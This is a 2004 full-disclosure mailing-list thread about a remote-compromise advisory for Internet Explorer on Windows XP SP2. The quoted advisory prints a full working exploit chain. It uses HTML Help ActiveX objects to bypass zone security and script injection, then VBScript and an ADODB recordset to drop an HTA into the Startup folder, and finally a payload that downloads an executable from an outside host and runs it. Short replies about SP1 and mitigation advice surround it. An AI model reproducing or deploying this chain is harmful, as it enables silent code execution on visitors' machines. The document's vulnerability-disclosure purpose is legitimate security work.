[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <JBEEIFHMJEMDBGMNEHCOGEEECAAA.mevanchik@relationship1.com>
Date: Sat, 25 Dec 2004 21:08:23 -0500
From: "Michael Evanchik" <mevanchik@...ationship1.com>
To: "morning_wood" <se_cur_ity@...mail.com>,
<full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>,
<NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>, <vuln@...nwatch.org>
Subject: RE: YEY AGAIN Automatic remote compromise
ofInternetExplorer Service Pack 2 XP SP2
Not sure the issue of SP1. We didnt test on older technology not have
access to a SP1 machine anymore
Mike
www.michaelevanchik.com
-----Original Message-----
From: full-disclosure-bounces@...ts.netsys.com
[mailto:full-disclosure-bounces@...ts.netsys.com]On Behalf Of
morning_wood
Sent: Saturday, December 25, 2004 1:24 PM
To: Michael Evanchik; full-disclosure@...ts.netsys.com;
bugtraq@...urityfocus.com; NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM;
vuln@...nwatch.org
Subject: Re: [Full-Disclosure] YEY AGAIN Automatic remote compromise
ofInternetExplorer Service Pack 2 XP SP2
must only be for SP2? No effect on SP1
no drop, no funny action noted.
cheers,
mw
----- Original Message -----
From: "Michael Evanchik" <mevanchik@...ationship1.com>
To: <full-disclosure@...ts.netsys.com>; <bugtraq@...urityfocus.com>;
<NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>; <vuln@...nwatch.org>
Sent: Friday, December 24, 2004 8:10 AM
Subject: [Full-Disclosure] YEY AGAIN Automatic remote compromise of
InternetExplorer Service Pack 2 XP SP2
> Did they really do a good job on service pack 2? Was it worth the
> investment that's reported more then the missile defense system? All
these
> articles on the great achievement by Microsoft and XP SP2 really merit?
> They totally forgot HTA files and HTM help files. Who knows that else.
>
>
>
> "Microsoft SP2 team, that is unacceptable, YOUR FIRED." Donald Trump
>
>
>
>
>
>
>
>
>
> http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm
>
>
>
>
>
> Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise
>
> Dec, 21 2004
>
>
> Vulnerable
> ----------
> - Microsoft Internet Explorer 6.0
> - Microsoft Windows XP Pro SP2
> - Microsoft Windows XP Home SP2
>
>
> Not Tested
> ------------------------
> - Microsoft Windows 98
> - Microsoft Internet Explorer 5.x
> - Microsoft Windows 2003 Server
>
>
>
> Severity
> ---------
> Critical - Remote code execution, no user intervention
>
>
> Intro
> ------
> Although hundreds of millions of dollars have been spent on securing SP2,
> perfection is impossible. Through the joint effort of Michael Evanchik
> (http://www.michaelevanchik.com) and Paul from Greyhats Security
> (http://greyhats.cjb.net), a very critical vulnerability has been
developed
> that can compromise a user's system without the need for user interaction
> besides visiting the malicious page. The vulnerability is not actually a
> vulnerability in itself, but rather it is uses multiple known holes in SP2
> including Help ActiveX Control Related Topics Zone Security Bypass
> Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting
> Vulnerability.
>
>
>
> Why Microsoft has still not patched two of these known vulnerabilities
that
> have been out for almost a half of year now, is beyond me.
>
>
>
>
> Tech Stuff and Explanation
> --------------------------
>
> 1. Create a webpage with the following code:
>
> sp2rc.htm
> ---------------------------------------------------------------------
> <OBJECT id="localpage" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
> style="position:absolute;top:140;left:72;z-index:100;"
> codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:Just a button">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
>
value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
> </OBJECT>
>
> <OBJECT id="inject" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
> style="position:absolute;top:140;left:72;z-index:100;"
> codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:Just a button">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
> value='command;javascript:execScript("document.write(\"<script
> language=\\\"vbscript\\\"
>
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fr
> omCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
> </OBJECT>
>
> <script>
> localpage.HHClick();
> setTimeout("inject.HHClick()",100);
> </script>
> ---------------------------------------------------------------------
>
> Explanation of above code:
> The first object (id: localpage) tells hhctrl.ocx to open a help popup
> window to the location
C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm.
> This file was chosen because it is treated as the local zone and it
doesn't
> have any script to mess us up. On some computers an error is shown before
> the popup. This is the user's only chance to prevent the vulnerability
from
> working. If internet explorer were to be closed at this point, the user
> would be safe.
>
> The second object (id: inject) tells the help popup to navigate to a
> javascript protocol, which executes. Thus, cross site scripting has just
> taken place. A script tag that uses a remote file is written to the page,
> and writehta.txt (below) is executed in the unsecured local zone.
>
> In the script, HHClick is able to be used to automate the vulnerability.
> This is more effective than the previously described method of requiring a
> user to click on a button.
>
>
> 2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the
> user's startup folder. See Michael Evanchik's analysis of the drag and
drop
> vulnerability for an explanation on adodb recordset.
>
> Also it is reported that a ADODB recordset can be build locally without
> using a http server or ftp server like below.
>
> writehta.txt
> ---------------------------------------------------------------------
> Dim Conn, rs
> Set Conn = CreateObject("ADODB.Connection")
> Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
> "Dbq=http://www.malware.com;" & _
> "Extensions=asc,csv,tab,txt;" & _
> "Persist Security Info=False"
> Dim sql
> sql = "SELECT * from foobar.txt"
> set rs = conn.execute(sql)
> set rs =CreateObject("ADODB.recordset")
> rs.Open "SELECT * from foobar.txt", conn
> rs.Save "C:\Documents and Settings\All Users\Start
> Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
> rs.close
> conn.close
> window.close
> ---------------------------------------------------------------------
>
>
> 3. f00bar.txt (thanks malware for hosting this file) is the file requested
> by the adodb recordset (again, read the drag and drop analysis at
> www.michaelevanchik.com for an explanation on how this works and why the
the
> f00bar.txt looks like it does). Because there is absolutely no limit on
what
> you can do in an hta file, an old, yet effective method of requesting and
> saving a file to the user's hd is used. From that, a wscript shell is
> created and used to run the program. And now, ladies and gentlemen, we
have
> compromised the user's machine.
>
> f00bar.txt
> ---------------------------------------------------------------------
> "meaning less shit i had to put here"
> "<script language=vbscript> crap = """
> """: on error resume next: crap = """
> """ : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
> """ : o.open
> ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False :
> crap="""
> """ : o.send : crap="""
> """ : set s = createobject(""adodb.stream"") : crap="""
> """ : s.type=1 : crap="""
> """ : s.open : crap="""
> """ : s.write o.responseBody : crap="""
> """ : s.savetofile ""C:\malware.exe"",2 : crap="""
> """ : Set ws = CreateObject(""WScript.Shell"") : crap="""
> """ : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
> """</script> crap="""
> ---------------------------------------------------------------------
>
>
> 4. Upload hhtctrl.ocx for the computers that don't happen to have this
> control. All XP's seem to have this by default, some win2k3's do not
> (according to Michael Evanchik)
>
>
> Proof of Concept?
> ------------------
> - http://freehost07.websamba.com/greyhats/sp2rc.htm
>
> - If an error is shown, press OK. This is normal.
>
> - Notice in your startup menu a new file called Microsoft Office.hta. When
> run, this file will download and launch a harmless executable (which
> includes a pretty neat fire animation)
>
>
>
> Vendor Recommendations
> ----------------------
> - Like Michael Evanchik said in his previous analysis, Microsoft needs to
> apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help
> (chm) files as well.
>
> - This might be a little farfetched, but it would solve a lot of problems:
> Take out the startup folder and only support running files during startup
> through the registry. The startup folder is a major part of this
> vulnerability and I can almost guarantee it will be used for another
remote
> compromise.
>
> - Microsoft could possibly take HTA files out altogether. I have not seen
> them used for anything beyond hacking.
>
> - No vulnerability is too small or too insignificant to be taken
seriously.
> Treat every vulnerability as if it could be dangerous.
>
>
>
> User Recommendations
> ---------------------
> - Disable hta files.
> - Get yourself antivirus software. I recommend Symantec because once they
> get their lazy asses off the couch and fix some of this stuff you will be
a
> lot better off.
> - Disable active scripting in Internet Explorer. If nothing else, do this.
> - Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox
> www.mozilla.org)
>
>
>
> Credit
> ------
> Paul from Greyhats
> Michael Evanchik
> Http equiv (thanks for allowing me to use your server for f00bar.txt)
>
>
> Greets
> ------
> - Liu Die Yu (all the work you've done is amazing)
>
>
> Contact
> -------
> paul@...yhats.cjb.net
> http://greyhats.cjb.net
>
> Note
> -----
> Greyhats is becoming bigger and is in need of an upgrade. If anyone is
> interested in donating some webspace and a domain name I would be very
> appreciative. Contact me so that we may work something out :)
>
>
>
>
>
> Michael Evanchik
>
> Relationship1
>
> p: 914-921-4400
>
> f: 914-921-6007
>
> mailto:mevanchik@...ationship1.com
>
> web: http://www.relationship1.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists